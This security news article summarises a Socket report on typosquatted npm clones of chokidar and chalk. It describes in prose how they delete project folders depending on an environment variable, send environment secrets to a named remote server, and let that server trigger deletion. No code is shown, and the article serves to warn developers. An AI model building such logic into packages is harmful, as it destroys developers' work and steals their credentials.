A recent report by researchers at Socket reveals a concerning supply chain attack targeting popular Node.js libraries, chokidar and chalk, via typosquatting. The attacker, identified as “davn118,” created malicious clones of these trusted tools, embedding destructive logic and data exfiltration routines to compromise developers’ projects.
Chokidar and chalk are essential Node.js libraries:
- Chokidar serves as a file-watching library with 56 million weekly downloads.
- Chalk is used for terminal string styling, boasting over 265 million downloads per week.
However, the malicious packages—named cschokidar-next and achalk-next—hide destructive capabilities under the guise of “minimal and efficient” alternatives. According to the report, “The attacker copies the entire legitimate code for each library, then tacks on destructive and exfiltrating logic at the bottom. Notably, each fake package reuses a similar README as the authentic library.”
How the Trojan Libraries Work
- File Destruction with “thanks()”: Both clones use a recursive file-deletion function named thanks(). For chokidar variants, the function triggers based on specific environmental conditions. When the NODE_ENV variable does not equal “development,” the script deletes critical directories like .git, .vscode, src, and node_modules. “The script removes not only .vscode and .package.json but also a broader set of folders if the key is invalid: ./library, ./mock, ./public, and more.“
- Data Exfiltration in Chalk Clones: Unlike chokidar, the chalk clones steal environment variables, such as VUE_APP_SECRET_KEY and VUE_GITHUB_USER_NAME, and send them to a remote server (yc.cnzzsoft[.]com). “If the server responds with data.code == 202, the code calls thanks() on directories like ./.git and ./node_modules, effectively letting the attacker decide whether to nuke your project.”
The legitimate libraries are widely used in development pipelines, making their clones a potent threat. “By hijacking chokidar and chalk, the attacker davn118 transformed trusted developer tools into Trojan horses, poised to wipe your system or harvest your secrets at the slightest mismatch in environment variables,” Socket emphasizes.
For detailed insights, visit Socket’s official report. Stay proactive and secure your dependencies!
